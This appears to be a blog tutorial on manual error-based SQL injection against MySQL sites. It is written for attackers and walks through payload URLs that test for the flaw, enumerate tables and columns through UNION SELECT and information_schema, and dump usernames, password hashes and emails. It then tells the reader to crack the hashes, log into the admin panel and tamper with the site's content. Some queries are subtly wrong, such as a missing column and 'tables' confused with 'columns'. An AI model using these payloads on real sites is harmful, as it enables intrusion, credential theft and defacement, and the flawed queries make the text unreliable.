Manual SQL Injection | Error Based
What is SQL injection ?
SQL Injection is the method used for bypassing user authentication of any webform(Login portals).An attacker gives a malicious string input to the webform which takes the user to the admin area of websites. An attacker can add, delete files and play with website contents after gaining access to the admin area.
1. Check for vulnerability
let‘s say that we have some site like this
http://www.site.com/news.php?id=1
Now to test it is vulnerable we add to the end of URL ' (quote), and that would be
http://www.site.com/news.php?id=1'
If it is vulnerable you should get an SQL error such as
"Sorry: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1” or something like that."
2. Find the number of columns
To find number of columns we use statement ORDER BY. This function tells the SQL database how to order the result. We use this to find how many tables are there. You need to type order by 1/*(or 1--) and keep adding one until you get an error.
Example:
http://www.site.com/news.php?id=1 order by 1/* <-- no error
http://www.site.com/news.php?id=1 order by 2/* <-- no error
http://www.site.com/news.php?id=1 order by 3/* <-- no error
http://www.site.com/news.php?id=1 order by 4/* <-- An error
This means there are only 3 tables because we got an error after order by 3
3. Check for UNION function
The UNION function shows data from the selected tables or columns etc.
Example:
http://www.site.com/news.php?id=1 union all select 1,2,3/*
OR (anyone is used , same result )
http://www.site.com/news.php?id=1 union all select 1,2,3--
(We know there are 3 tables). If you see numbers on the page then the UNION function is working. Try – in place of /* if the query doesn‘t give any result.
4. Check for MySQL version
If you get, say number one, then this is where we insert the @@version or version(). (@@version or version() represent the version of the database)
Example:
http://www.site.com/news.php?id=1 union all select @@version,2,3/*
You may get "Illegal mix of collations (IMPLICIT+ COERCIBLE) kind of errors. If you get any error while using above query then you must need to convert the statement using the convert() function.
Example:
http://www.site.com/news.php?id=1 union all select unhex(hex(@@version)),2,3/*
5. Getting table and column name
-- If the MySQL version is < 5 (i.e 4.1.33, 4.1.12...).
We need to guess table names in most of cases. You can guess some table names from listed below: user, admin, member, username, user, usr, user_name, password,pass, passwd, pwd etc.
Example:
http://www.site.com/news.php?id=1 union all select 1,2,3 from admin/*
If we see any number,it can be 1 or 2 or 3, and then it concludes that table name admin exists in database. Now check Column names.
Example(find username):
http://www.site.com/news.php?id=1 union all select 1,username,3 from admin/*
If you get an error the column doesn't exist.
If it works you will get a username displayed on the page, example would be admin, or superadmin etc.
Example(finding password):
http://www.site.com/news.php?id=1 union all select 1,password,3 from admin/*
If you get an error the column doesn't exist. If it worked, you will see a password on the page in hash format or in plain-text format. Join all strings using the concat() function. The concat() function joins all strings related to your query.
Example:
http://www.site.com/news.php?id=1 union all select 1,concat(username,0x3a,password),3 from admin/*
(0x3a is Hex for a colon). You could also use an ASCII value for the colon. Using ASCII Table. If it worked you will see all usernames and passwords in order like so: username:password Some admin change the column name but you can use mysql.user instead.
Example:
http://www.site.com/news.php?id=1 union all select 1,concat(user,0x3a,password),3 from mysql.user/*
--If the MySQL version is =>5
Find Table name
We use table_name and information_schema.tables.for this purpose.
Example:
http://www.site.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables/*
Here we replace the our number 2 with table_name to get the first table from information_schema.tables
If we couldn‘t find any result then we need to add LIMIT to the end of query to list out all tables.
Example:
http://www.site.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
We can change limit 0,1 to limit 1,1.To view the 2nd table.
Example:
http://www.site.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
the second table will be displayed.
We should have to put limit 2,1to get 3rd table.
Example:
http://www.site.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 2,1/*
We need to add one until we will get some useful like db_admin, poll_user, auth, auth_user etc.
Find Column names:
Here we use column_name and information_schema.columns
Example:
http://www.site.com/news.php?id=1 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
the first column wills be displayed.
Example:
http://www.site.com/news.php?id=1 union all select 1,column_name,3 from information_schema.tables limit 1,1/*
The second table will be displayed.
We need to put limit 0,1 to get 3rd table.
Example(Finding Password):
http://www.site.com/news.php?id=1 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*
You will get into in this format user:password(or hash):email
example:
admin:hash:whatever@blabla.com
Now you see the username , e-mail and password in hash on the webpage. As seen below:
Just copy the hash password and go to the best hash cracking sites to crack the hash.
I recommend you http://md5decrypter.co.uk/
Now find the login page of the site. Suppose i have
http://www.site.com/admin/login.php
Now enter the username and password and you made access to the admin panel. Now just play with the website content........................ Ha ha ha
SQL Vulnerable Sites List
SQL Injection Automated Tools
0 comments:
Post a Comment